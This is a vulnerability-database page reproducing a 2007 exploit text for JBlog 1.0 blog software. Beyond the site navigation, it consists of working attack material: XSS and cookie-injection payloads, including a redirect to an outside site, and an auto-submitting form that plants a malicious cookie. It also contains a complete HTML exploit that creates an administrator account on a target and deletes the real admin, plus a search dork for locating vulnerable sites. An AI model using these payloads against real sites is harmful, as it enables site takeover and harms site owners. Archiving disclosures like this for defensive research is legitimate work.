Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

jblog-xss.txt

πŸ—“οΈΒ 23 Jul 2007Β 00:00:00Reported byΒ S4miTypeΒ 
packetstorm
Β packetstormπŸ”—Β packetstormsecurity.comπŸ‘Β 16Β Views

JBlog version 1.0 security vulnerabilities, XSS and Remote Privilege Escalation exploi

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!--  
##############################################################################  
# Script...............: JBlog version: 1.0 #  
# Script Site..........: http://www.jmuller.net/jblog #  
# Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation #  
# Access...............: Remote #  
# level................: Dangerous #  
# Author...............: S4mi #  
# Contact..............: S4mi[at]LinuxMail.org #  
# #  
##############################################################################  
  
cookies Manipulation + Cross Site Scripting :  
=========================================================================  
xss:  
----  
http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com   
  
cookies Manipulation:  
--------------------  
The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to :  
  
<meta http-equiv='Set-cookie' content='name=value'>  
  
also we can do this :  
  
<meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'>  
  
or :  
  
<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'>  
  
This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)  
---------------------------------------------------------------------------  
<html>  
<head>  
<title>Inject Cookie Xploit By S4mi</title>  
</head>  
<body>  
<script language="JavaScript">  
function JBlogxpl()   
{  
document.xploit.action=document.xploit.victim.value;  
document.xploit.submit();  
}  
</script>  
<form name="xploit" method="post" action="">  
<input type="hidden" name="victim" value="http://victim/jblog/recherche.php">  
<input type="hidden" name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.com/">'>" />  
<script>document.location="javascript: JBlogxpl()"</script>  
</form>  
</body>  
</html>  
  
============================================================================  
  
Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :   
============================================================================  
-->  
  
<html>  
<title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title>  
<body>  
<script language="JavaScript">  
function JBlogxpl() {  
if (document.xploit.victim.value=="") {  
alert("Please enter target!");  
return false;  
}  
{  
xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php";  
xploit.mot.value=document.xploit.mot.value;  
xploit.droit.value=document.xploit.droit.value;  
xploit.submit();  
}  
}  
  
</script>  
<strong><p>  
-------------------------------------------------------------------------------------------<br>  
#JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br>  
# Discovered By...............: S4mi <br>  
# Contact..........................: S4mi[at]LinuxMail.org<br>  
#<br>  
# Google Dork : "propulsΓ© par JBlog" <br>  
--------------------------------------------------------------------------------------------</p>  
<form name="xploit" method="POST" onSubmit="JBlogxpl();">  
Target -> Http://  
<input type="text" name="victim" value="www.Site.com/Path/" size="44">  
<p> Username.......->  
<input type="text" name="mot" value="ZaZ" size="30">   
(your password will be by default: <i>"admin"</i>)</p>  
<p> User type......->  
<select name="droit">  
<option value="3">Admin</option>  
<option value="2">Moderator</option>  
<option value="1">Editor</option>  
</select>  
</p>  
<p>Submit...........->  
<input name="submit" type="submit" value=" Xploit it ">  
</p>  
</form>  
<br>---------------------------------------------------------------------------------------<br>  
#NB : Remember do not use a probably existing username (such as "admin"). <br>  
#If you want to Delete real admin account :D login into your New Created admin account & use this :<br>  
--------------------------------------------------------------------------------------------<p>  
<script language="JavaScript">  
  
function AdminDelete()  
{ if (document.xploit.victim.value=="") {  
alert("Please enter target!");  
return false;  
}  
if(confirm('Are you Sure!! want really DELETE user ?'))  
document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value;  
}  
</script>  
<form name="userdel" method="POST" onSubmit="">  
ID...............> <input type="text" name="id" value="1" size="3">  
</form>  
<a href="#" OnClick="AdminDelete()"/>Delete</a>  
  
<br>-----------------------------------------------------------------------------------------------<br>  
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me!  
  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
jblogxssremote privilege escalationcookie manipulations4mi
16
.json
Report